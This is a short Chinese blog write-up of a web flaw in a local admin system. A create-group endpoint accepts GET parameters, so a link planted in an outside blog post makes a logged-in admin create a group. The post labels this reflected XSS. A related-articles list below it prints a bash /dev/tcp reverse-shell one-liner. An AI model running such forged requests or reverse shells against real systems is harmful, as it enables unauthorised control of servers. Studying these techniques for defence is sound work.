记录一个反射型XSS漏洞

原創 qq284489030 2020-06-30 15:01

【漏洞发现与分析】

本地有个软件系统,burpsuite开启主动扫描,报了个XSS漏洞:

添加群组功能的接口:

仔细确认,原本是个post:

漏洞是把请求参数放到get链接里,且能成功执行:

【漏洞利用】:

csdn发布博客,博客内容文字test添加链接地址:http://192.168.1.50/admin/group/create/?groupname=13

已登录漏洞系统、且有创建群组权限的用户,在浏览器中打开csdn 验证博客并点击文字test

创建群组成功:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

【安全渗透】sql注入

目錄1. sql 注入1.1 sql 注入 介紹1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 實現方式2. 環境搭建2.1 vmware虛擬機軟件2.2 靶機(學習使用項目環境)2.3 滲透機(學習攻擊

披着床单的小王子 2020-07-06 18:44:36

第三周任务,利用文件上传漏洞

0x00 前言 本週主要學習了文件上傳各種姿勢,掌握了常見的黑白名單後綴繞過、文件內容檢查繞過的原理、實現及簡單防護。 0X01 文件上傳校驗姿勢 o 客戶端javascript校驗(一般只校驗後綴名) o 服務端校驗 o 文件頭

欧阳大仙萌萌哒 2020-07-01 04:05:33

信安入门神级书单

《社會工程:安全體系中的人性漏洞》 《Android應用安全防護和逆向分析》 《逆向工程核心原理》 《Metasploit滲透測試魔鬼訓練營》 《鳥哥linux的私房菜》(第三版) 《Linux二進制分析》 《網絡空間

欧阳大仙萌萌哒 2020-07-01 04:05:33

【工具】Netcat(1)基本使用

一.概述 netcat是一款基於tcp/ip協議(c/s模型的)的工具。 netcat的功能包括: 數據傳輸 文件傳輸 建立後門 端口轉發 內外網突破 二.基礎使用方法 創建一個服務器端: nc -l -p [local_po

Hector Will 2020-06-26 09:24:30

【工具】Netcat(2)反弹shell

應用場景:某些拿到服務器權限之後,想要設置一個反彈shell。但是目標服務器上沒有安裝Netcat時。 1.反彈shell(bash) 反彈shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接

Hector Will 2020-06-26 09:24:30

XSS详解(概念+靶场演示)反射型与存储型的比较与详细操作

Eichi_ 2020-05-06 18:27:40

【Shiro_exploit】PYTHON报错解决:ModuleNotFoundError: No module named 'requests'

欧阳大仙萌萌哒 2020-05-05 12:11:26

CSRF 越权区别

qq284489030 2020-04-23 10:09:30

一、文件上传漏洞 低、中、高三级别 详解

Eichi_ 2020-04-21 00:36:09

二、文件包含漏洞 低、中 、高三级别详解(一句话木马,图片木马)

Eichi_ 2020-04-21 00:36:09

近日总结 -- 越权、CSRF、逻辑支付、存储型 XSS

qq284489030 2020-04-19 09:47:42

TCP劫持下的反弹Shell注入攻击

Eichi_ 2020-04-01 10:26:51

ARP欺骗攻击

Eichi_ 2020-04-01 10:26:51

网络安全基础与常见攻击(ARP攻击、ICMP攻击、DDOS攻击、TCP RST攻击)

Eichi_ 2020-04-01 10:26:51

浅谈DHCP欺骗攻击

Eichi_ 2020-04-01 10:26:51